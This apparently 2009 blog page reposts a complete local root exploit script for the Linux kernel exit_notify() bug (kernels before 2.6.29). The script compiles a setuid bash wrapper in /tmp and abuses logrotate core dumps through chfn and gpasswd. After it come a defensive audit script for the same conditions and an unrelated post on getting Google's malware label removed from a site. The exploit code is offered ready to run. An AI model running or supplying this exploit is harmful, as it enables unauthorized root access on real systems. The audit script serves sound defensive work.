Linux kernel local root exploit information  

Sunday, April 12, 2009

#!/bin/sh


# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################




SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
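
For defenders, the script above depends on three observable conditions: fs.suid_dumpable set to 1 or 2, a core file landing in /etc/logrotate.d, and a wrapper under /tmp that becomes setuid. The following audit is an added example, not part of the original post; the function name audit_tree and its root-prefix argument are assumptions made so the check can also be run against a copied or mounted tree.

```shell
#!/bin/sh
# Added example: defensive audit for the conditions this exploit depends on.
# audit_tree ROOT prints one line per finding and returns 1 if any were found.
# ROOT is a path prefix ("/" for the live system, or a mounted/copied tree).

audit_tree() {
    root=${1:-/}
    root=${root%/}
    findings=0

    # 1. The exploit only works when setuid programs are allowed to dump core.
    dumpable=$(cat "$root/proc/sys/fs/suid_dumpable" 2>/dev/null) || dumpable=""
    if [ -n "$dumpable" ] && [ "$dumpable" != "0" ]; then
        echo "WARN suid_dumpable=$dumpable (set fs.suid_dumpable=0)"
        findings=$((findings + 1))
    fi

    # 2. A core dump is an ELF file; none belongs in the logrotate config dir.
    for f in "$root"/etc/logrotate.d/*; do
        [ -f "$f" ] || continue
        magic=$(head -c 4 "$f" 2>/dev/null | tail -c 3)
        case "${f##*/}" in core|core.*) named=1 ;; *) named=0 ;; esac
        if [ "$magic" = "ELF" ] || [ "$named" = 1 ]; then
            echo "ALERT core-like file in logrotate.d: $f"
            findings=$((findings + 1))
        fi
    done

    # 3. Setuid files under /tmp (the script's shell wrapper ends up as one).
    if [ -d "$root/tmp" ]; then
        suid=$(find "$root/tmp" -xdev -type f -perm -4000 2>/dev/null)
        if [ -n "$suid" ]; then
            echo "ALERT setuid file(s) under tmp:"
            echo "$suid"
            findings=$((findings + 1))
        fi
    fi

    [ "$findings" -eq 0 ]
}

# Stand-alone use: sh audit.sh /   (exit status 1 means findings were printed)
if [ "$#" -gt 0 ]; then audit_tree "$1"; fi
```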

Eliminating the Google Malware/Badware Label

Monday, April 6, 2009

There are a few things you need to know:
Malware (short for "malicious software") is a computer program created for the specific purposes of its author, and it looks for weaknesses in software. Generally, malware is created to break into or destroy software or an operating system. (Wiki)

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google, as the biggest search engine in the world, wants to give searchers clean and safe search results, both from the website side and from the SEO side. On the website side in particular, besides crawling, Google also scans websites to determine whether they contain scripts that fall into the malware/badware category.

In this activity Google works with stopbadware.org to give the information to:
The administrator of the suspect website. Google usually delivers the email to:

abuse@website.com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

So you need to create one of the above email addresses as a precaution, to receive the information Google delivers if your website is hit with the malware label.
They also inform the public (Google Search users) that the website contains malware, by presenting something like this:



Cause:
One way malware/badware gets into your website is through a virus on your computer: when you update the website (uploading PHP or HTML files), whether through FTP or a browser, the virus injects malware/badware script into the website's pages without your noticing. When Google then scans the site and finds the malware/badware script, it immediately applies the Badware/Malware label in its SERP.

How to fix it:

To remove the Badware/Malware label from Google's SERP, you need to do the following:
1. Sweep the malware/badware script out of your website's scripts
2. Request a review from stopbadware.org
3. Request a review from Google

For point 3 in particular, requesting a review from Google, the procedure is:

1. You need a Google account; a Google email account will do.

2. Go to http://google.com/accounts and select Webmaster / Webmaster Tools
3. If that menu is not shown, you first have to sign up for Google Webmaster Tools.
4. Register your website in Google Webmaster Tools, then verify it
5. After verifying, open the Overview menu and click the Review site link

Wait 2 x 24 hours; stopbadware.org will review your website, and if your website is truly clear of malware/badware they will contact Google, and Google will then do its review directly.

Once they declare your website really clean, the Badware/Malware label in Google's SERP will soon be removed. The removal usually takes 1 x 24 hours... so be patient. :)

